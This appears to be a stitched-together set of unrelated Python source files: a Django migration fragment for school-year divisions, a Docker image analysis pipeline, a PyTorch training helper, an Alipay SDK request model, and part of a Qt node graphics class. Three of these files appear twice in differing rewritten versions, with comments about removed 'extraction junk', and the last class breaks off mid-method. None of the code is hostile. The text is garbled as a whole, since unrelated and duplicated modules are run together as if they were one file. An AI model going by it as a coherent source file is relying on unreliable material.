            for period in course.periods.all():
                old_period_id = period.id
                period.id, period.pk = None, None
                period.school_year_division = school_year_division
                period.save()
                new_period_ids[(key, old_period_id)] = period.id
                new_period_ids_fuzzy[(key, period.name)] = period.id
            school_year_division_ids[key] = school_year_division.id
        course.school_year_division_id = school_year_division_ids[key]
        course.save()
        # fix discounts: re-point each discount at the cloned period,
        # matching by old period id first, then by period name
        for discount in CourseDiscount.objects.filter(
            registration__subject_id=course.id
        ).select_related('period', 'registration'):
            old_period = discount.period
            discount.period = None
            discount.period_id = new_period_ids.get((key, old_period.id))
            if discount.period_id is None:
                discount.period_id = new_period_ids_fuzzy.get((key, old_period.name))
            discount.save()
    # delete original periods (those never attached to a division)
    SchoolYearPeriod.objects.filter(school_year_division=None).delete()
class Migration(migrations.Migration):
    """Introduce ``SchoolYearDivision`` and re-parent periods/courses onto it.

    Schema changes plus a forward-only data migration
    (``create_school_year_divisions`` defined above in this module).
    """

    dependencies = [
        ('leprikon', '0014_variable_symbol'),
    ]

    operations = [
        migrations.CreateModel(
            name='SchoolYearDivision',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=150, verbose_name='division name')),
                ('period_name', models.CharField(max_length=150, verbose_name='period name')),
                ('school_year', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='divisions', to='leprikon.SchoolYear', verbose_name='school year')),
            ],
            options={
                'ordering': ('name',),
                'verbose_name': 'school year division',
                'verbose_name_plural': 'school year divisions',
            },
        ),
        migrations.AlterUniqueTogether(
            name='schoolyeardivision',
            # set literal instead of set([...]) -- same value, idiomatic
            unique_together={('school_year', 'name')},
        ),
        migrations.AddField(
            model_name='course',
            name='school_year_division',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='courses', to='leprikon.SchoolYearDivision', verbose_name='school year division'),
        ),
        migrations.AddField(
            model_name='schoolyearperiod',
            name='school_year_division',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='periods', to='leprikon.SchoolYearDivision', verbose_name='school year division'),
        ),
        # data migration; removed extraction junk that had corrupted the
        # closing bracket of this list
        migrations.RunPython(create_school_year_divisions),
    ]
# isort:skip_file
# Standalone pipeline module: Django must be configured before any
# scanpipe imports, hence the early django.setup() call (and the isort
# skip directive so the import order is preserved by formatters).
import os
import django
django.setup()
from scanpipe import pipes
from scanpipe.pipelines import Pipeline
from scanpipe.pipelines import step
from scanpipe.pipes import docker as docker_pipes
from scanpipe.pipes import rootfs as rootfs_pipes
class DockerPipeline(Pipeline):
    """
    A pipeline to analyze a Docker image: extract images and layers,
    resolve the distro, catalog resources, then scan for packages and
    file-level clues.
    """

    @step
    def start(self):
        """
        Load the Project instance.
        """
        self.project = self.get_project(self.project_name)
        self.next(self.extract_images)

    @step
    def extract_images(self):
        """
        Extract images from the uploaded tarballs.
        """
        self.images = docker_pipes.get_and_extract_images_from_image_tarballs(
            self.project
        )
        self.next(self.extract_layers)

    @step
    def extract_layers(self):
        """
        Extract every layer of every image into the project codebase.
        """
        for img in self.images:
            dirname = os.path.basename(img.base_location)
            destination = str(self.project.codebase_path / dirname)
            img.extract_layers(target_dir=destination)
        self.next(self.find_images_linux_distro)

    @step
    def find_images_linux_distro(self):
        """
        Determine the Linux distribution of each image.
        """
        for img in self.images:
            img.get_and_set_distro()
        self.next(self.collect_images_information)

    @step
    def collect_images_information(self):
        """
        Collect per-image metadata and store it on the project.
        """
        data = [docker_pipes.get_image_data(img) for img in self.images]
        self.project.extra_data.update({"images": data})
        self.project.save()
        self.next(self.collect_and_create_codebase_resources)

    @step
    def collect_and_create_codebase_resources(self):
        """
        Register every image file as a CodebaseResource.
        """
        for img in self.images:
            docker_pipes.create_codebase_resources(self.project, img)
        self.next(self.collect_and_create_system_packages)

    @step
    def collect_and_create_system_packages(self):
        """
        Collect installed system packages for each layer based on the distro.
        """
        for img in self.images:
            docker_pipes.scan_image_for_system_packages(self.project, img)
        self.next(self.tag_uninteresting_codebase_resources)

    @step
    def tag_uninteresting_codebase_resources(self):
        """
        Flag whiteout files and remaining files not from a system package.
        """
        docker_pipes.tag_whiteout_codebase_resources(self.project)
        rootfs_pipes.tag_uninteresting_codebase_resources(self.project)
        self.next(self.scan_for_application_packages)

    @step
    def scan_for_application_packages(self):
        """
        Scan unknown resources for application package information.
        """
        pipes.scan_for_application_packages(self.project)
        self.next(self.scan_for_files)

    @step
    def scan_for_files(self):
        """
        Scan unknown resources for copyrights, licenses, emails, and urls.
        """
        pipes.scan_for_files(self.project)
        self.next(self.analyze_scanned_files)

    @step
    def analyze_scanned_files(self):
        """
        Check single file scan results for completeness.
        """
        pipes.analyze_scanned_files(self.project)
        self.next(self.tag_not_analyzed_codebase_resources)

    @step
    def tag_not_analyzed_codebase_resources(self):
        """
        Sanity check for leftover unanalyzed files. We should have none.
        """
        pipes.tag_not_analyzed_codebase_resources(self.project)
        self.next(self.end)

    @step
    def end(self):
        """
        Analysis completed.
        """
if __name__ == "__main__":
    # Instantiating the pipeline runs it when this module is executed as
    # a script. (Removed extraction junk that had corrupted this line.)
    DockerPipeline()
# isort:skip_file
import os
import django
django.setup()
from scanpipe import pipes
from scanpipe.pipelines import Pipeline
from scanpipe.pipelines import step
from scanpipe.pipes import docker as docker_pipes
from scanpipe.pipes import rootfs as rootfs_pipes
class DockerPipeline(Pipeline):
    """
    A pipeline to analyze a Docker image.

    Steps run in the order wired by the ``self.next(...)`` calls below.
    """
    @step
    def start(self):
        """
        Load the Project instance.
        """
        self.project = self.get_project(self.project_name)
        self.next(self.extract_images)
    @step
    def extract_images(self):
        """
        Extract the images from tarballs.
        """
        self.images = docker_pipes.get_and_extract_images_from_image_tarballs(
            self.project
        )
        self.next(self.extract_layers)
    @step
    def extract_layers(self):
        """
        Extract layers from images.
        """
        for image in self.images:
            # each image's layers land in a per-image directory of the codebase
            image_dirname = os.path.basename(image.base_location)
            target_dir = str(self.project.codebase_path / image_dirname)
            image.extract_layers(target_dir=target_dir)
        self.next(self.find_images_linux_distro)
    @step
    def find_images_linux_distro(self):
        """
        Find the linux distro of the images.
        """
        for image in self.images:
            image.get_and_set_distro()
        self.next(self.collect_images_information)
    @step
    def collect_images_information(self):
        """
        Collect images information and store on project.
        """
        images_data = [docker_pipes.get_image_data(image) for image in self.images]
        self.project.extra_data.update({"images": images_data})
        self.project.save()
        self.next(self.collect_and_create_codebase_resources)
    @step
    def collect_and_create_codebase_resources(self):
        """
        Collect and create all image files as CodebaseResource.
        """
        for image in self.images:
            docker_pipes.create_codebase_resources(self.project, image)
        self.next(self.collect_and_create_system_packages)
    @step
    def collect_and_create_system_packages(self):
        """
        Collect installed system packages for each layer based on the distro.
        """
        for image in self.images:
            docker_pipes.scan_image_for_system_packages(self.project, image)
        self.next(self.tag_uninteresting_codebase_resources)
    @step
    def tag_uninteresting_codebase_resources(self):
        """
        Flag remaining files not from a system package.
        """
        docker_pipes.tag_whiteout_codebase_resources(self.project)
        rootfs_pipes.tag_uninteresting_codebase_resources(self.project)
        self.next(self.scan_for_application_packages)
    @step
    def scan_for_application_packages(self):
        """
        Scan unknown resources for packages infos.
        """
        pipes.scan_for_application_packages(self.project)
        self.next(self.scan_for_files)
    @step
    def scan_for_files(self):
        """
        Scan unknown resources for copyrights, licenses, emails, and urls.
        """
        pipes.scan_for_files(self.project)
        self.next(self.analyze_scanned_files)
    @step
    def analyze_scanned_files(self):
        """
        Analyze single file scan results for completeness.
        """
        pipes.analyze_scanned_files(self.project)
        self.next(self.tag_not_analyzed_codebase_resources)
    @step
    def tag_not_analyzed_codebase_resources(self):
        """
        Check for leftover files for sanity. We should have none.
        """
        pipes.tag_not_analyzed_codebase_resources(self.project)
        self.next(self.end)
    @step
    def end(self):
        """
        Analysis completed.
        """
if __name__ == "__main__":
    # Instantiating the pipeline runs it when this module is executed as
    # a script. (Removed extraction junk that had corrupted this line.)
    DockerPipeline()
import sys
import os
import numpy as np
from collections import OrderedDict
import torch
import torch.nn.functional as F
from src.utils import Print
class Trainer():
    """ train / eval helper class: wraps a model together with its
    optimizer/scheduler and per-split loss loggers """
    def __init__(self, model):
        self.model = model
        self.optim = None          # set later via set_optim_scheduler()
        self.scheduler = None      # set later via set_optim_scheduler()
        # initialize logging parameters
        self.epoch = 0.0
        self.best_loss = None      # lowest eval loss seen so far
        self.logger_train = Logger()
        self.logger_eval = Logger()
    def train(self, batch, device):
        # training of the model: one optimization step on one mini-batch
        batch = set_device(batch, device)
        self.model.train()
        self.optim.zero_grad()
        inputs, labels, set_idxs = batch
        outputs = self.model(inputs)
        loss = get_loss(outputs, labels)
        loss.backward()
        self.optim.step()
        # logging (sigmoid turns logits into probabilities for the logger)
        outputs = torch.sigmoid(outputs)
        self.logger_train.update(len(outputs), loss.item())
        self.logger_train.keep(outputs, set_idxs)
    def evaluate(self, batch, device):
        # evaluation of the model (no gradient tracking)
        batch = set_device(batch, device)
        self.model.eval()
        with torch.no_grad():
            inputs, labels, set_idxs = batch
            outputs = self.model(inputs)
            loss = get_loss(outputs, labels)
        # logging
        outputs = torch.sigmoid(outputs)
        self.logger_eval.update(len(outputs), loss.item())
        self.logger_eval.keep(outputs, set_idxs)
    def scheduler_step(self):
        # scheduler_step: step the LR scheduler on the current eval loss
        self.scheduler.step(self.logger_eval.get_loss())
    def save_model(self, save_prefix):
        # save state_dict to checkpoint, only when the eval loss improved
        if save_prefix is None: return
        loss = self.logger_eval.get_loss()
        if self.best_loss is None or loss < self.best_loss:
            self.best_loss = loss
            torch.save(self.model.state_dict(), save_prefix + "/TargetNet.pt")
    def load_model(self, checkpoint, output):
        # load state_dict from checkpoint
        Print('loading a model state_dict from the checkpoint', output)
        checkpoint = torch.load(checkpoint, map_location="cpu")
        state_dict = OrderedDict()
        for k, v in checkpoint.items():
            # strip the "module." prefix left by nn.DataParallel wrapping
            if k.startswith("module."): k = k[7:]
            state_dict[k] = v
        self.model.load_state_dict(state_dict)
    def save_outputs(self, idx, save_prefix):
        # save validation output (one TSV line per kept output value)
        OUT = open(save_prefix + "/%s_outputs.txt" % (idx), "w")
        OUT.write("\t".join(["set_idx", "output"]) + "\n")
        for i in range(len(self.logger_eval.outputs)):
            OUT.write("\t".join([str(i), "%f" % self.logger_eval.outputs[i]]) + "\n")
            if i % 5 == 0:
                # lightweight in-place progress display on stderr
                print('# {} {:.1%}'.format(idx, i / len(self.logger_eval.outputs)), end='\r', file=sys.stderr)
        print(' ' * 150, end='\r', file=sys.stderr)
        OUT.close()
        self.log_reset()
    def set_device(self, device):
        # set gpu configurations (move the model to the given device)
        self.model = self.model.to(device)
    def set_optim_scheduler(self, run_cfg, params):
        # set optim and scheduler for training
        optim, scheduler = get_optim_scheduler(run_cfg, params)
        self.optim = optim
        self.scheduler = scheduler
    def aggregate(self, set_num):
        # aggregate kept outputs, labels, set_idxs (delegates to the logger)
        self.logger_eval.aggregate(set_num)
    def get_headline(self):
        # get a headline for logging
        headline = ["ep", "split", "loss", "|", "loss"]
        return "\t".join(headline)
    def log(self, idx, output):
        # logging: one line with train loss and eval loss, then reset
        log = ["%03d" % self.epoch, "train",
               "%.4f" % self.logger_train.get_loss(), "|", idx, "%.4f" % self.logger_eval.get_loss()]
        Print("\t".join(log), output)
        self.log_reset()
    def log_reset(self):
        # reset logging parameters
        self.logger_train.reset()
        self.logger_eval.reset()
class Logger():
    """Accumulates a running (sample-weighted) loss average and kept
    model outputs / set indices for later aggregation."""
    def __init__(self):
        self.total = 0.0
        self.loss = 0.0
        self.outputs = []
        self.set_idxs = []
        self.log = []
    def update(self, total, loss):
        """Accumulate one mini-batch; *loss* is the batch-average loss."""
        self.total += total
        self.loss += total * loss
    def keep(self, outputs, set_idxs):
        """Stash outputs and set indices (as numpy) for aggregation."""
        self.outputs.append(outputs.cpu().detach().numpy())
        self.set_idxs.append(set_idxs.cpu().detach().numpy())
    def get_loss(self):
        """Return the loss averaged over all samples seen since reset."""
        return self.loss / self.total
    def aggregate(self, set_labels):
        """Reduce kept per-sample outputs to one max-score per set."""
        self.outputs = np.concatenate(self.outputs, axis=0)
        self.set_idxs = np.concatenate(self.set_idxs, axis=0)
        num_sets = len(set_labels)
        if len(self.set_idxs) != num_sets:
            reduced = np.zeros(num_sets, np.float32)
            for set_idx in range(num_sets):
                member_mask = self.set_idxs == set_idx
                if np.max(member_mask) > 0:
                    reduced[set_idx] = np.max(self.outputs[member_mask])
            self.outputs = reduced
            self.set_idxs = np.zeros(num_sets, np.float32)
    def reset(self):
        """Clear all accumulated state."""
        self.total = 0.0
        self.loss = 0.0
        self.outputs = []
        self.set_idxs = []
        self.log = []
def get_optim_scheduler(cfg, params):
    """Build the Adam optimizer and a plateau LR scheduler.

    ``params[0]`` gets ``cfg.weight_decay``; ``params[1]`` gets none.
    The scheduler multiplies the LR by 0.2 after 5 epochs without
    improvement of the monitored ("min" mode) metric.
    """
    param_groups = [
        {'params': params[0], 'weight_decay': cfg.weight_decay},
        {'params': params[1], 'weight_decay': 0},
    ]
    optimizer = torch.optim.Adam(param_groups, lr=cfg.learning_rate)
    scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, "min", 0.2, 5)
    return optimizer, scheduler
def get_loss(outputs, labels):
    """Binary cross-entropy on logits.

    Numerically equivalent to the manual formulation
    ``-mean(y * logsigmoid(x) + (1 - y) * logsigmoid(-x))`` but delegates
    to the library's stable fused implementation.
    """
    return F.binary_cross_entropy_with_logits(outputs, labels)
def set_device(batch, device):
    """Recursively move every tensor in *batch* onto *device*.

    Tuples and lists are traversed (both come back as lists, matching the
    original behaviour); tensors are moved; anything else passes through
    unchanged.  Also removes extraction junk that had corrupted the final
    return line.
    """
    if isinstance(batch, (tuple, list)):
        return [set_device(t, device) for t in batch]
    if isinstance(batch, torch.Tensor):
        return batch.to(device)
    return batch
import sys
import os
import numpy as np
from collections import OrderedDict
import torch
import torch.nn.functional as F
from src.utils import Print
class Trainer():
    """ train / eval helper class """
    def __init__(self, model):
        self.model = model
        self.optim = None
        self.scheduler = None
        # initialize logging parameters
        self.epoch = 0.0
        self.best_loss = None
        self.logger_train = Logger()
        self.logger_eval = Logger()
    def train(self, batch, device):
        # training of the model (one optimizer step per mini-batch)
        batch = set_device(batch, device)
        self.model.train()
        self.optim.zero_grad()
        inputs, labels, set_idxs = batch
        outputs = self.model(inputs)
        loss = get_loss(outputs, labels)
        loss.backward()
        self.optim.step()
        # logging
        outputs = torch.sigmoid(outputs)
        self.logger_train.update(len(outputs), loss.item())
        self.logger_train.keep(outputs, set_idxs)
    def evaluate(self, batch, device):
        # evaluation of the model (gradients disabled)
        batch = set_device(batch, device)
        self.model.eval()
        with torch.no_grad():
            inputs, labels, set_idxs = batch
            outputs = self.model(inputs)
            loss = get_loss(outputs, labels)
        # logging
        outputs = torch.sigmoid(outputs)
        self.logger_eval.update(len(outputs), loss.item())
        self.logger_eval.keep(outputs, set_idxs)
    def scheduler_step(self):
        # scheduler_step (driven by the current eval loss)
        self.scheduler.step(self.logger_eval.get_loss())
    def save_model(self, save_prefix):
        # save state_dicts to checkpoint, only on eval-loss improvement
        if save_prefix is None: return
        loss = self.logger_eval.get_loss()
        if self.best_loss is None or loss < self.best_loss:
            self.best_loss = loss
            torch.save(self.model.state_dict(), save_prefix + "/TargetNet.pt")
    def load_model(self, checkpoint, output):
        # load state_dicts from checkpoint
        Print('loading a model state_dict from the checkpoint', output)
        checkpoint = torch.load(checkpoint, map_location="cpu")
        state_dict = OrderedDict()
        for k, v in checkpoint.items():
            # drop the "module." prefix added by nn.DataParallel
            if k.startswith("module."): k = k[7:]
            state_dict[k] = v
        self.model.load_state_dict(state_dict)
    def save_outputs(self, idx, save_prefix):
        # save validation output as a two-column TSV file
        OUT = open(save_prefix + "/%s_outputs.txt" % (idx), "w")
        OUT.write("\t".join(["set_idx", "output"]) + "\n")
        for i in range(len(self.logger_eval.outputs)):
            OUT.write("\t".join([str(i), "%f" % self.logger_eval.outputs[i]]) + "\n")
            if i % 5 == 0:
                # in-place progress display on stderr
                print('# {} {:.1%}'.format(idx, i / len(self.logger_eval.outputs)), end='\r', file=sys.stderr)
        print(' ' * 150, end='\r', file=sys.stderr)
        OUT.close()
        self.log_reset()
    def set_device(self, device):
        # set gpu configurations
        self.model = self.model.to(device)
    def set_optim_scheduler(self, run_cfg, params):
        # set optim and scheduler for training
        optim, scheduler = get_optim_scheduler(run_cfg, params)
        self.optim = optim
        self.scheduler = scheduler
    def aggregate(self, set_num):
        # aggregate kept outputs, labels, set_idxs
        self.logger_eval.aggregate(set_num)
    def get_headline(self):
        # get a headline for logging
        headline = ["ep", "split", "loss", "|", "loss"]
        return "\t".join(headline)
    def log(self, idx, output):
        # logging, then reset of both loggers
        log = ["%03d" % self.epoch, "train",
               "%.4f" % self.logger_train.get_loss(), "|", idx, "%.4f" % self.logger_eval.get_loss()]
        Print("\t".join(log), output)
        self.log_reset()
    def log_reset(self):
        # reset logging parameters
        self.logger_train.reset()
        self.logger_eval.reset()
class Logger():
    """ Logger class: sample-weighted running loss plus kept outputs """
    def __init__(self):
        self.total = 0.0
        self.loss = 0.0
        self.outputs = []
        self.set_idxs = []
        self.log = []
    def update(self, total, loss):
        # update logger for current mini-batch
        # `loss` is the batch-average loss; weight it by the batch size
        self.total += total
        self.loss += loss * total
    def keep(self, outputs, set_idxs):
        # keep outputs, labels, and set_idxs for future computations
        self.outputs.append(outputs.cpu().detach().numpy())
        self.set_idxs.append(set_idxs.cpu().detach().numpy())
    def get_loss(self):
        # get current averaged loss (over all samples since reset)
        loss = self.loss / self.total
        return loss
    def aggregate(self, set_labels):
        # aggregate kept labels and outputs
        self.outputs = np.concatenate(self.outputs, axis=0)
        self.set_idxs = np.concatenate(self.set_idxs, axis=0)
        set_num = len(set_labels)
        if len(self.set_idxs) != set_num:
            # reduce per-sample outputs to one score per set by taking
            # the max over the samples that belong to each set index
            set_outputs = np.zeros(set_num, np.float32)
            for i in range(set_num):
                idxs = self.set_idxs == i
                if np.max(idxs) > 0: set_outputs[i] = np.max(self.outputs[idxs])
            self.outputs = set_outputs
            self.set_idxs = np.zeros(set_num, np.float32)
    def reset(self):
        # reset logger
        self.total = 0.0
        self.loss = 0.0
        self.outputs = []
        self.set_idxs = []
        self.log = []
def get_optim_scheduler(cfg, params):
    """ configure optim and scheduler """
    # params[0]: parameters with weight decay; params[1]: without
    optim = torch.optim.Adam([{'params': params[0], 'weight_decay': cfg.weight_decay},
                              {'params': params[1], 'weight_decay': 0}], lr=cfg.learning_rate)
    # multiply LR by 0.2 after 5 epochs without improvement ("min" mode)
    scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optim, "min", 0.2, 5)
    return optim, scheduler
def get_loss(outputs, labels):
    """ get (binary) cross entropy loss """
    # BCE on logits via logsigmoid: -mean(y*log s(x) + (1-y)*log s(-x))
    loss = -torch.mean(labels * F.logsigmoid(outputs) + (1 - labels) * F.logsigmoid(-outputs))
    return loss
def set_device(batch, device):
    """Recursively move every tensor in *batch* onto *device*.

    Tuples and lists are traversed (both come back as lists, matching the
    original behaviour); tensors are moved; anything else passes through
    unchanged.  Also removes extraction junk that had corrupted the final
    return line.
    """
    if isinstance(batch, (tuple, list)):
        return [set_device(t, device) for t in batch]
    if isinstance(batch, torch.Tensor):
        return batch.to(device)
    return batch
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.OperateTask import OperateTask
class AlipayCommerceAbntaskModifyModel(object):
    """Request model for the Alipay commerce ABN-task modify API.

    Auto-generated SDK style: private backing fields exposed through
    properties, with plain-dict (de)serialization helpers.
    """
    def __init__(self):
        self._operate_task_list = None
        self._operation_time = None
        self._operator_id = None
        self._operator_nick = None
    @property
    def operate_task_list(self):
        return self._operate_task_list
    @operate_task_list.setter
    def operate_task_list(self, value):
        # accepts a list of OperateTask instances or of plain dicts;
        # non-list values are silently ignored
        if isinstance(value, list):
            self._operate_task_list = list()
            for i in value:
                if isinstance(i, OperateTask):
                    self._operate_task_list.append(i)
                else:
                    self._operate_task_list.append(OperateTask.from_alipay_dict(i))
    @property
    def operation_time(self):
        return self._operation_time
    @operation_time.setter
    def operation_time(self, value):
        self._operation_time = value
    @property
    def operator_id(self):
        return self._operator_id
    @operator_id.setter
    def operator_id(self, value):
        self._operator_id = value
    @property
    def operator_nick(self):
        return self._operator_nick
    @operator_nick.setter
    def operator_nick(self, value):
        self._operator_nick = value
    def to_alipay_dict(self):
        # serialize the set (truthy) fields into a plain dict; nested
        # objects are serialized recursively via their to_alipay_dict
        params = dict()
        if self.operate_task_list:
            if isinstance(self.operate_task_list, list):
                for i in range(0, len(self.operate_task_list)):
                    element = self.operate_task_list[i]
                    if hasattr(element, 'to_alipay_dict'):
                        self.operate_task_list[i] = element.to_alipay_dict()
            if hasattr(self.operate_task_list, 'to_alipay_dict'):
                params['operate_task_list'] = self.operate_task_list.to_alipay_dict()
            else:
                params['operate_task_list'] = self.operate_task_list
        if self.operation_time:
            if hasattr(self.operation_time, 'to_alipay_dict'):
                params['operation_time'] = self.operation_time.to_alipay_dict()
            else:
                params['operation_time'] = self.operation_time
        if self.operator_id:
            if hasattr(self.operator_id, 'to_alipay_dict'):
                params['operator_id'] = self.operator_id.to_alipay_dict()
            else:
                params['operator_id'] = self.operator_id
        if self.operator_nick:
            if hasattr(self.operator_nick, 'to_alipay_dict'):
                params['operator_nick'] = self.operator_nick.to_alipay_dict()
            else:
                params['operator_nick'] = self.operator_nick
        return params
    @staticmethod
    def from_alipay_dict(d):
        # build a model from a plain dict; returns None for falsy input
        if not d:
            return None
        o = AlipayCommerceAbntaskModifyModel()
        if 'operate_task_list' in d:
            o.operate_task_list = d['operate_task_list']
        if 'operation_time' in d:
            o.operation_time = d['operation_time']
        if 'operator_id' in d:
            o.operator_id = d['operator_id']
        if 'operator_nick' in d:
            o.operator_nick = d['operator_nick']
        return o
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.OperateTask import OperateTask
class AlipayCommerceAbntaskModifyModel(object):
    """Request model for the Alipay commerce ABN-task modify API.

    Private backing fields exposed through properties, with plain-dict
    (de)serialization helpers.  Fixes the extraction junk that had
    corrupted the final return line, and dedupes the repeated
    simple-field serialization in ``to_alipay_dict``.
    """

    def __init__(self):
        self._operate_task_list = None
        self._operation_time = None
        self._operator_id = None
        self._operator_nick = None

    @property
    def operate_task_list(self):
        return self._operate_task_list

    @operate_task_list.setter
    def operate_task_list(self, value):
        # accepts a list of OperateTask instances or of plain dicts;
        # non-list values are silently ignored (matches SDK convention)
        if isinstance(value, list):
            converted = []
            for item in value:
                if isinstance(item, OperateTask):
                    converted.append(item)
                else:
                    converted.append(OperateTask.from_alipay_dict(item))
            self._operate_task_list = converted

    @property
    def operation_time(self):
        return self._operation_time

    @operation_time.setter
    def operation_time(self, value):
        self._operation_time = value

    @property
    def operator_id(self):
        return self._operator_id

    @operator_id.setter
    def operator_id(self, value):
        self._operator_id = value

    @property
    def operator_nick(self):
        return self._operator_nick

    @operator_nick.setter
    def operator_nick(self, value):
        self._operator_nick = value

    def to_alipay_dict(self):
        """Serialize the set (truthy) fields into a plain dict."""
        params = dict()
        task_list = self.operate_task_list
        if task_list:
            if isinstance(task_list, list):
                # serialize list elements in place, as the generated SDK does
                for idx, element in enumerate(task_list):
                    if hasattr(element, 'to_alipay_dict'):
                        task_list[idx] = element.to_alipay_dict()
            if hasattr(task_list, 'to_alipay_dict'):
                params['operate_task_list'] = task_list.to_alipay_dict()
            else:
                params['operate_task_list'] = task_list
        # the three scalar fields share identical serialization logic
        for attr in ('operation_time', 'operator_id', 'operator_nick'):
            value = getattr(self, attr)
            if value:
                if hasattr(value, 'to_alipay_dict'):
                    params[attr] = value.to_alipay_dict()
                else:
                    params[attr] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a model from a plain dict; returns None for falsy input."""
        if not d:
            return None
        o = AlipayCommerceAbntaskModifyModel()
        for attr in ('operate_task_list', 'operation_time',
                     'operator_id', 'operator_nick'):
            if attr in d:
                setattr(o, attr, d[attr])
        return o
import string
from xml.sax.saxutils import escape
from AnyQt.QtWidgets import (
QGraphicsItem,
QGraphicsObject,
QGraphicsTextItem,
QGraphicsWidget,
QGraphicsDropShadowEffect,
QStyle,
QApplication,
)
from AnyQt.QtGui import (
QPen,
QBrush,
QColor,
QPalette,
QIcon,
QPainter,
QPainterPath,
QPainterPathStroker,
)
from AnyQt.QtCore import (
Qt,
QEvent,
QPointF,
QRectF,
QRect,
QSize,
QTimer,
QPropertyAnimation,
)
from AnyQt.QtCore import pyqtSignal as Signal, pyqtProperty as Property
from .graphicspathobject import GraphicsPathObject
from .utils import saturated, radial_gradient
from ...scheme.node import UserMessage
from ...registry import NAMED_COLORS
from ...resources import icon_loader
from .utils import uniform_linear_layout
def create_palette(light_color, color):
    """
    Return a new :class:`QPalette` for the :class:`NodeBodyItem`.

    The Inactive group is built from *light_color*, the Active group
    from *color*; the button text color is fixed.
    """
    assignments = [
        (QPalette.Inactive, QPalette.Light, saturated(light_color, 50)),
        (QPalette.Inactive, QPalette.Midlight, saturated(light_color, 90)),
        (QPalette.Inactive, QPalette.Button, light_color),
        (QPalette.Active, QPalette.Light, saturated(color, 50)),
        (QPalette.Active, QPalette.Midlight, saturated(color, 90)),
        (QPalette.Active, QPalette.Button, color),
    ]
    palette = QPalette()
    for group, role, value in assignments:
        palette.setColor(group, role, value)
    palette.setColor(QPalette.ButtonText, QColor("#515151"))
    return palette
def default_palette():
    """
    Create and return the default (yellow) palette for a node.
    """
    light = QColor(NAMED_COLORS["light-yellow"])
    base = QColor(NAMED_COLORS["yellow"])
    return create_palette(light, base)
def animation_restart(animation):
    # Pause a running animation before calling start().
    # NOTE(review): per Qt docs, start() resumes a paused animation rather
    # than rewinding it -- confirm this achieves the intended "restart".
    if animation.state() == QPropertyAnimation.Running:
        animation.pause()
    animation.start()
# Drop-shadow color used for node body and anchor shadow effects.
SHADOW_COLOR = "#9CACB4"
# Outline color applied to the node body when it has focus.
FOCUS_OUTLINE_COLOR = "#609ED7"
class NodeBodyItem(GraphicsPathObject):
    """
    The central part (body) of the `NodeItem`.
    """
    def __init__(self, parent=None):
        GraphicsPathObject.__init__(self, parent)
        assert isinstance(parent, NodeItem)
        self.__processingState = 0
        self.__progress = -1   # -1 means the progress arc is not drawn
        self.__animationEnabled = False
        self.__isSelected = False
        self.__hasFocus = False
        self.__hover = False
        self.__shapeRect = QRectF(-10, -10, 20, 20)
        self.setAcceptHoverEvents(True)
        self.setFlag(QGraphicsItem.ItemSendsScenePositionChanges, True)
        self.setFlag(QGraphicsItem.ItemSendsGeometryChanges, True)
        self.setPen(QPen(Qt.NoPen))
        self.setPalette(default_palette())
        self.shadow = QGraphicsDropShadowEffect(
            blurRadius=3, color=QColor(SHADOW_COLOR), offset=QPointF(0, 0)
        )
        self.shadow.setEnabled(True)
        # An item with the same shape as this object, stacked behind this
        # item as a source for QGraphicsDropShadowEffect. Cannot attach
        # the effect to this item directly as QGraphicsEffect makes the item
        # non devicePixelRatio aware.
        shadowitem = GraphicsPathObject(self, objectName="shadow-shape-item")
        shadowitem.setPen(Qt.NoPen)
        shadowitem.setBrush(QBrush(QColor(SHADOW_COLOR).lighter()))
        shadowitem.setGraphicsEffect(self.shadow)
        shadowitem.setFlag(QGraphicsItem.ItemStacksBehindParent)
        self.__shadow = shadowitem
        # animates the shadow blur radius on hover/selection changes
        self.__blurAnimation = QPropertyAnimation(self.shadow, b"blurRadius", self)
        self.__blurAnimation.setDuration(100)
        self.__blurAnimation.finished.connect(self.__on_finished)
        # brief scale "ping" played when processing finishes
        self.__pingAnimation = QPropertyAnimation(self, b"scale", self)
        self.__pingAnimation.setDuration(250)
        self.__pingAnimation.setKeyValues([(0.0, 1.0), (0.5, 1.1), (1.0, 1.0)])
    # TODO: The body item should allow the setting of arbitrary painter
    # paths (for instance rounded rect, ...)
    def setShapeRect(self, rect):
        """
        Set the item's shape `rect`. The item should be confined within
        this rect.
        """
        path = QPainterPath()
        path.addEllipse(rect)
        self.setPath(path)
        self.__shadow.setPath(path)
        self.__shapeRect = rect
    def setPalette(self, palette):
        """
        Set the body color palette (:class:`QPalette`).
        """
        self.palette = palette
        self.__updateBrush()
    def setAnimationEnabled(self, enabled):
        """
        Set the node animation enabled.
        """
        if self.__animationEnabled != enabled:
            self.__animationEnabled = enabled
    def setProcessingState(self, state):
        """
        Set the processing state of the node.
        """
        if self.__processingState != state:
            self.__processingState = state
            # 'ping' once when processing transitions to idle (state == 0)
            if not state and self.__animationEnabled:
                self.ping()
    def setProgress(self, progress):
        """
        Set the progress indicator state of the node. `progress` should
        be a number between 0 and 100.
        """
        self.__progress = progress
        self.update()
    def ping(self):
        """
        Trigger a 'ping' animation.
        """
        animation_restart(self.__pingAnimation)
    def hoverEnterEvent(self, event):
        self.__hover = True
        self.__updateShadowState()
        return GraphicsPathObject.hoverEnterEvent(self, event)
    def hoverLeaveEvent(self, event):
        self.__hover = False
        self.__updateShadowState()
        return GraphicsPathObject.hoverLeaveEvent(self, event)
    def paint(self, painter, option, widget):
        """
        Paint the shape and a progress meter.
        """
        # Let the default implementation draw the shape
        if option.state & QStyle.State_Selected:
            # Prevent the default bounding rect selection indicator.
            option.state = option.state ^ QStyle.State_Selected
        GraphicsPathObject.paint(self, painter, option, widget)
        if self.__progress >= 0:
            # Draw the progress meter over the shape.
            # Set the clip to shape so the meter does not overflow the shape.
            painter.save()
            painter.setClipPath(self.shape(), Qt.ReplaceClip)
            color = self.palette.color(QPalette.ButtonText)
            pen = QPen(color, 5)
            painter.setPen(pen)
            painter.setRenderHints(QPainter.Antialiasing)
